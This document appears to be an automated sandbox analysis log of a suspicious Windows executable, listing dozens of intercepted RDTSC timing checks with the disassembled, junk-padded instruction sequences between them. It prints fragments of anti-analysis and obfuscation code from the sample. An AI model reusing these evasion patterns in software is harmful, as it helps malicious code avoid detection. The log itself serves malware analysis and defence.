Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 397313 second address: 3973A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jns 00007FAD0CDA85F6h 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push eax 0x00000010 call 00007FAD0CDA85F8h 0x00000015 pop eax 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a add dword ptr [esp+04h], 00000018h 0x00000022 inc eax 0x00000023 push eax 0x00000024 ret 0x00000025 pop eax 0x00000026 ret 0x00000027 push 00000000h 0x00000029 push 00000000h 0x0000002b push eax 0x0000002c call 00007FAD0CDA85F8h 0x00000031 pop eax 0x00000032 mov dword ptr [esp+04h], eax 0x00000036 add dword ptr [esp+04h], 00000019h 0x0000003e inc eax 0x0000003f push eax 0x00000040 ret 0x00000041 pop eax 0x00000042 ret 0x00000043 sub dword ptr [ebp+122D214Ch], edi 0x00000049 push 00000000h 0x0000004b jmp 00007FAD0CDA8605h 0x00000050 jmp 00007FAD0CDA8600h 0x00000055 xchg eax, ebx 0x00000056 push eax 0x00000057 push edx 0x00000058 push edi 0x00000059 jmp 00007FAD0CDA85FEh 0x0000005e pop edi 0x0000005f rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 3973A3 second address: 3973B5 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FAD0D216D58h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 3973B5 second address: 3973B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 397EC2 second address: 397ECD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FAD0D216D56h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 39897C second address: 39898E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b ja 00007FAD0CDA85F6h 0x00000011 pop esi 0x00000012 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 3986D9 second address: 3986F3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD0D216D5Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b jl 00007FAD0D216D5Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 39898E second address: 398993 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 399180 second address: 399184 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 399184 second address: 39918E instructions: 0x00000000 rdtsc 0x00000002 jc 00007FAD0CDA85F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 39E166 second address: 39E17C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD0D216D5Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 39E17C second address: 39E1A2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD0CDA8604h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FAD0CDA85FAh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 39E1A2 second address: 39E1ED instructions: 0x00000000 rdtsc 0x00000002 jno 00007FAD0D216D58h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b mov dword ptr [ebp+122D2FD3h], edx 0x00000011 movsx edi, cx 0x00000014 push 00000000h 0x00000016 pushad 0x00000017 add esi, 791F8210h 0x0000001d call 00007FAD0D216D62h 0x00000022 pushad 0x00000023 popad 0x00000024 pop ecx 0x00000025 popad 0x00000026 push 00000000h 0x00000028 mov ebx, dword ptr [ebp+122D392Dh] 0x0000002e xchg eax, esi 0x0000002f pushad 0x00000030 push edi 0x00000031 pushad 0x00000032 popad 0x00000033 pop edi 0x00000034 jo 00007FAD0D216D5Ch 0x0000003a push eax 0x0000003b push edx 0x0000003c rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 39F127 second address: 39F13E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FAD0CDA85FCh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 3A006F second address: 3A0073 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 3A0073 second address: 3A0079 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 3A0079 second address: 3A007E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 3A007E second address: 3A0084 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 39E340 second address: 39E357 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAD0D216D62h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 39F302 second address: 39F306 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 39E357 second address: 39E3B0 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push ebx 0x0000000a push eax 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d pop eax 0x0000000e pop ebx 0x0000000f nop 0x00000010 mov bx, AD10h 0x00000014 push dword ptr fs:[00000000h] 0x0000001b or dword ptr [ebp+122D2D43h], esi 0x00000021 mov dword ptr fs:[00000000h], esp 0x00000028 jnl 00007FAD0D216D5Bh 0x0000002e mov eax, dword ptr [ebp+122D0445h] 0x00000034 xor bl, 0000002Ah 0x00000037 push FFFFFFFFh 0x00000039 jmp 00007FAD0D216D5Ch 0x0000003e nop 0x0000003f js 00007FAD0D216D74h 0x00000045 push eax 0x00000046 push edx 0x00000047 jno 00007FAD0D216D56h 0x0000004d rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 39F306 second address: 39F30C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 3A2177 second address: 3A217B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 3A2EBE second address: 3A2ED1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAD0CDA85FFh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 39F30C second address: 39F3A6 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FAD0D216D5Ch 0x00000008 js 00007FAD0D216D56h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 nop 0x00000011 mov ebx, dword ptr [ebp+12472A2Ch] 0x00000017 push dword ptr fs:[00000000h] 0x0000001e push 00000000h 0x00000020 push edi 0x00000021 call 00007FAD0D216D58h 0x00000026 pop edi 0x00000027 mov dword ptr [esp+04h], edi 0x0000002b add dword ptr [esp+04h], 00000017h 0x00000033 inc edi 0x00000034 push edi 0x00000035 ret 0x00000036 pop edi 0x00000037 ret 0x00000038 jmp 00007FAD0D216D5Ah 0x0000003d mov dword ptr fs:[00000000h], esp 0x00000044 push 00000000h 0x00000046 push edi 0x00000047 call 00007FAD0D216D58h 0x0000004c pop edi 0x0000004d mov dword ptr [esp+04h], edi 0x00000051 add dword ptr [esp+04h], 00000014h 0x00000059 inc edi 0x0000005a push edi 0x0000005b ret 0x0000005c pop edi 0x0000005d ret 0x0000005e pushad 0x0000005f mov dword ptr [ebp+12458AD9h], edx 0x00000065 mov dx, di 0x00000068 popad 0x00000069 mov edi, 5687E7ACh 0x0000006e mov eax, dword ptr [ebp+122D1109h] 0x00000074 mov edi, dword ptr [ebp+122D2BD6h] 0x0000007a push FFFFFFFFh 0x0000007c mov ebx, dword ptr [ebp+12475F32h] 0x00000082 and edi, dword ptr [ebp+122D1D43h] 0x00000088 nop 0x00000089 pushad 0x0000008a push eax 0x0000008b push edx 0x0000008c pushad 0x0000008d popad 0x0000008e rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 3A2ED1 second address: 3A2F55 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push ebx 0x0000000e call 00007FAD0CDA85F8h 0x00000013 pop ebx 0x00000014 mov dword ptr [esp+04h], ebx 0x00000018 add dword ptr [esp+04h], 00000015h 0x00000020 inc ebx 0x00000021 push ebx 0x00000022 ret 0x00000023 pop ebx 0x00000024 ret 0x00000025 push 00000000h 0x00000027 mov ebx, esi 0x00000029 push 00000000h 0x0000002b push 00000000h 0x0000002d push eax 0x0000002e call 00007FAD0CDA85F8h 0x00000033 pop eax 0x00000034 mov dword ptr [esp+04h], eax 0x00000038 add dword ptr [esp+04h], 0000001Dh 0x00000040 inc eax 0x00000041 push eax 0x00000042 ret 0x00000043 pop eax 0x00000044 ret 0x00000045 sub di, B061h 0x0000004a mov dword ptr [ebp+12454B53h], edi 0x00000050 xchg eax, esi 0x00000051 jmp 00007FAD0CDA85FAh 0x00000056 push eax 0x00000057 push ebx 0x00000058 push eax 0x00000059 push edx 0x0000005a jmp 00007FAD0CDA8607h 0x0000005f rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 3A2F55 second address: 3A2F59 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 3A4069 second address: 3A4090 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD0CDA8605h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FAD0CDA85FBh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 3A41A7 second address: 3A41AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 3A5125 second address: 3A5129 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 3A5129 second address: 3A512D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 3A6E5D second address: 3A6E61 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 3A6E61 second address: 3A6E67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 3A6E67 second address: 3A6E6D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 3A7E4D second address: 3A7E51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 3A7E51 second address: 3A7E55 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 3A7E55 second address: 3A7E5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 3A80D0 second address: 3A80D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 3A7013 second address: 3A70B3 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FAD0D216D6Fh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007FAD0D216D61h 0x00000010 nop 0x00000011 sub edi, dword ptr [ebp+12475F32h] 0x00000017 push dword ptr fs:[00000000h] 0x0000001e mov dword ptr [ebp+122D2FD3h], edx 0x00000024 mov dword ptr fs:[00000000h], esp 0x0000002b pushad 0x0000002c mov edi, dword ptr [ebp+122D38FDh] 0x00000032 mov dx, 64CFh 0x00000036 popad 0x00000037 cld 0x00000038 mov eax, dword ptr [ebp+122D1125h] 0x0000003e mov di, D4C5h 0x00000042 push FFFFFFFFh 0x00000044 push 00000000h 0x00000046 push esi 0x00000047 call 00007FAD0D216D58h 0x0000004c pop esi 0x0000004d mov dword ptr [esp+04h], esi 0x00000051 add dword ptr [esp+04h], 00000015h 0x00000059 inc esi 0x0000005a push esi 0x0000005b ret 0x0000005c pop esi 0x0000005d ret 0x0000005e mov edi, 46B7C593h 0x00000063 nop 0x00000064 jng 00007FAD0D216D5Eh 0x0000006a jc 00007FAD0D216D58h 0x00000070 pushad 0x00000071 popad 0x00000072 push eax 0x00000073 push esi 0x00000074 push eax 0x00000075 push edx 0x00000076 push edi 0x00000077 pop edi 0x00000078 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 3A80D4 second address: 3A80D9 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 3A70B3 second address: 3A70B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 3A6073 second address: 3A6077 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 3ACAE5 second address: 3ACAE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 3AAE0E second address: 3AAE18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 3ACAE9 second address: 3ACAFF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD0D216D5Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jng 00007FAD0D216D5Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 3AAE18 second address: 3AAEA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 mov ebx, dword ptr [ebp+122D399Dh] 0x0000000f movsx edi, bx 0x00000012 push dword ptr fs:[00000000h] 0x00000019 xor bh, FFFFFF91h 0x0000001c mov dword ptr fs:[00000000h], esp 0x00000023 push 00000000h 0x00000025 push eax 0x00000026 call 00007FAD0CDA85F8h 0x0000002b pop eax 0x0000002c mov dword ptr [esp+04h], eax 0x00000030 add dword ptr [esp+04h], 00000019h 0x00000038 inc eax 0x00000039 push eax 0x0000003a ret 0x0000003b pop eax 0x0000003c ret 0x0000003d jmp 00007FAD0CDA85FDh 0x00000042 mov eax, dword ptr [ebp+122D0F3Dh] 0x00000048 push 00000000h 0x0000004a push esi 0x0000004b call 00007FAD0CDA85F8h 0x00000050 pop esi 0x00000051 mov dword ptr [esp+04h], esi 0x00000055 add dword ptr [esp+04h], 00000019h 0x0000005d inc esi 0x0000005e push esi 0x0000005f ret 0x00000060 pop esi 0x00000061 ret 0x00000062 adc edi, 7732C6FDh 0x00000068 push FFFFFFFFh 0x0000006a sbb di, 9C0Dh 0x0000006f push eax 0x00000070 push eax 0x00000071 push edx 0x00000072 push edx 0x00000073 push eax 0x00000074 push edx 0x00000075 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 3AAEA3 second address: 3AAEA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 3AAEA8 second address: 3AAEAE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 3ACD82 second address: 3ACD88 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 34BD7B second address: 34BD9B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD0CDA85FDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a jns 00007FAD0CDA85F6h 0x00000010 push esi 0x00000011 pop esi 0x00000012 pop ebx 0x00000013 popad 0x00000014 pushad 0x00000015 push esi 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 34BD9B second address: 34BDA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jbe 00007FAD0D216D56h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 3B6AC1 second address: 3B6AC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 3BC058 second address: 3BC05C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 3BC05C second address: 3BC066 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FAD0CDA85F6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 3BD4AF second address: 3BD4B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 3BD4B3 second address: 3BD4C0 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FAD0CDA85F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 3BD4C0 second address: 3BD4D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d jnc 00007FAD0D216D56h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 3BD4D3 second address: 3BD4E2 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 mov eax, dword ptr [eax] 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 3BD4E2 second address: 3BD4E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 3BD4E6 second address: 3BD4EC instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 3BD5B6 second address: 3BD5BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 3BD5BA second address: 3BD5BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 3BD5BE second address: 3BD5C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 3BD681 second address: 3BD696 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FAD0CDA85FCh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 3BD696 second address: 3BD6AB instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jng 00007FAD0D216D56h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 3BD813 second address: 3BD819 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 3BD819 second address: 3BD82D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jp 00007FAD0D216D5Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 3BD82D second address: 3BD831 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 3BD831 second address: 3BD838 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 3BD838 second address: 1E8BD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pop eax 0x00000008 clc 0x00000009 push dword ptr [ebp+122D0CB9h] 0x0000000f stc 0x00000010 call dword ptr [ebp+122D2C84h] 0x00000016 pushad 0x00000017 jp 00007FAD0CDA85FCh 0x0000001d sub dword ptr [ebp+122D1E50h], ecx 0x00000023 sub dword ptr [ebp+122D23BBh], edx 0x00000029 xor eax, eax 0x0000002b jmp 00007FAD0CDA85FFh 0x00000030 mov edx, dword ptr [esp+28h] 0x00000034 cmc 0x00000035 mov dword ptr [ebp+122D3759h], eax 0x0000003b cmc 0x0000003c jl 00007FAD0CDA85FCh 0x00000042 sub dword ptr [ebp+122D36C2h], eax 0x00000048 mov esi, 0000003Ch 0x0000004d jne 00007FAD0CDA85F7h 0x00000053 clc 0x00000054 add esi, dword ptr [esp+24h] 0x00000058 jc 00007FAD0CDA8601h 0x0000005e pushad 0x0000005f mov dword ptr [ebp+122D1E50h], esi 0x00000065 xor bl, FFFFFFE1h 0x00000068 popad 0x00000069 lodsw 0x0000006b mov dword ptr [ebp+122D36C2h], edi 0x00000071 add eax, dword ptr [esp+24h] 0x00000075 jmp 00007FAD0CDA8604h 0x0000007a jmp 00007FAD0CDA8605h 0x0000007f mov ebx, dword ptr [esp+24h] 0x00000083 mov dword ptr [ebp+122D36C2h], edi 0x00000089 push eax 0x0000008a push eax 0x0000008b push edx 0x0000008c jns 00007FAD0CDA85F8h 0x00000092 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 3C3B64 second address: 3C3B72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jno 00007FAD0D216D56h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 3C3B72 second address: 3C3B7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 rdtsc
Source: C:\Users\user\Desktop\rwFNJ4pHWG.exe	RDTSC instruction interceptor: First address: 3C3B7B second address: 3C3B85 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FAD0D216D56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
